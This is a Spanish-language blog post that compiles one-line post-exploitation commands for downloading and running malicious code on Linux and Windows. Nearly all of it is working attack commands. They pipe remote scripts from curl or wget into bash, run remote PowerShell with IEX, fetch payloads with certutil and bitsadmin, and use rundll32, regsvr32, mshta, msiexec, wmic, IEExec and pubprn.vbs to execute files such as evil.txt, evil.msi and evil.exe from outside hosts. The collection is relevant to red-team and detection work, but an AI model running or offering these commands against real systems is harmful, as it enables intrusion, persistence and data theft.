cmds para descargar y ejecutar código malicioso

En el proceso de una intrusión, normalmente en la fase de post-explotación, un atacante necesita descargar y ejecutar código malicioso a través de comandos para implementar operaciones tales como recopilación de información, persistencia, escalada de privilegios, bypasses de defensas, extracción de credenciales, movimiento lateral y exfiltración de datos. Hoy traemos una buena recopilación de comandos en una sóla línea para ello:

LINUX 

01. curl 

Ejecutar el shell script de la página http con curl, sin descargar, directamente en la máquina local.

Opción 1:curl -fsSL http://192.168.99.19:8080/test.sh | bash
Opción 2:bash < <( curl http://192.168.99.19:8080/test.sh  )

02. wget 

Ejecutar el comando wget para descargar programas maliciosos de forma remota.

Opción 1:wget -q -O- http://192.168.99.19:8080/test.sh | bash
Opción 2:wget http://192.168.99.19:8080/shell.txt -O /tmp/x.php && php /tmp/x.php
Combinar curl + wget para realizar la ejecución remota de código malicioso sin archivos.
bash -c '(curl -fsSL http://192.168.99.19:8080/test.sh||
wget -q -O- http://192.168.99.19:8080/test.sh)|bash -sh >/dev/null 2>&1&'

03. rcp 

El comando rcp se usa para copiar archivos o directorios remotos.

rcp root@x.x.x.x:./testfile testfile

04. scp 

scp es una versión mejorada de rcp, scp está cifrado.

scp username@servername:/path/filename /tmp/local_destination

05. rsync 

Utilizar rsync para sincronizar de forma remota y extraer archivos a un servidor local.

rsync -av x.x.x.x:/tmp/passwd.txt  /tmp/passwd.txt

06. sftp 

Utilizar sftp para descargar archivos en el servidor remoto.

sftp admin@192.168.99.242 <<EOF  
get  /tmp/2.txt            
quit 
EOF

WINDOWS 

01. Powershell 

Utilizar powershell para ejecutar scripts ps1 de forma remota.

powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.28.128/evil.txt'))"

02. Bitsadmin 

Utilizar el comando bitsadmin para descargar el archivo a la máquina de destino.

bitsadmin /transfer n http://192.168.28.128/imag/evil.txt d:\test\1.txt

03. certutil 

Se utiliza para hacer una copia de seguridad del servicio de certificados, por lo general, se recomienda eliminar la caché después de descargar el archivo.

#descargar archivos
certutil -urlcache -split -f http://192.168.28.128/imag/evil.txt test.php
#borrar la caché
certutil -urlcache -split -f http://192.168.28.128/imag/evil.txt delete

04. rundll32 

Con rundll32.exe, JavaScript se puede ejecutar a través de mshtml.dll, que depende del componente WScript.shell

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.28.131:8888/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

05. regsvr32 

Ejecución de payload remoto, analizar archivo .src.

regsvr32.exe /u /n /s /i:http://192.168.28.131:8888/file.sct scrobj.dll

06. wmic 

Ejecutar el siguiente comando WMIC para descargar y ejecutar el archivo XSL malicioso desde el servidor remoto:

wmic os get /FORMAT:"http://192.168.28.128/evil.xsl"

07. msiexec 

Se utiliza para instalar el paquete de instalación de Windows Installer y puede ejecutar el archivo msi de forma remota.

msiexec /q /i http://192.168.28.128/evil.msi

08. IEExec 

La aplicación IEexec.exe es un programa que viene con .NET Framework. Ejecutar IEExec.exe y usar la URL para iniciar otros programas.

crosoft.NET\Framework64\v2.0.50727>caspol.exe -s off
C:\Windows\Microsoft.NET\Framework64\v2.0.50727>IEExec.exe http://192.168.28.131/evil.exe

09. mshta 

mshta se usa para ejecutar archivos .hta

mshta http://192.168.28.128/run.hta

10. msxsl 

msxsl.exe es un programa utilizado por Microsoft para procesar XSL bajo la línea de comandos

msxsl http://192.168.28.128/scripts/demo.xml http://192.168.28.128/scripts/exec.xsl

11. pubprn.vbs 

Existe un script WSH firmado por Microsoft llamado pubprn.vbs en Windows 7 y superior, que se puede utilizar para analizar el script .sct:

"C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs" 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct

Fuente: https://mp.weixin.qq.com/s/pz6y8299gMUOgtZjZv5puw

Ver también: https://www.hackplayers.com/2017/12/comandos-en-una-sola-linea-para-windows.html

Comentarios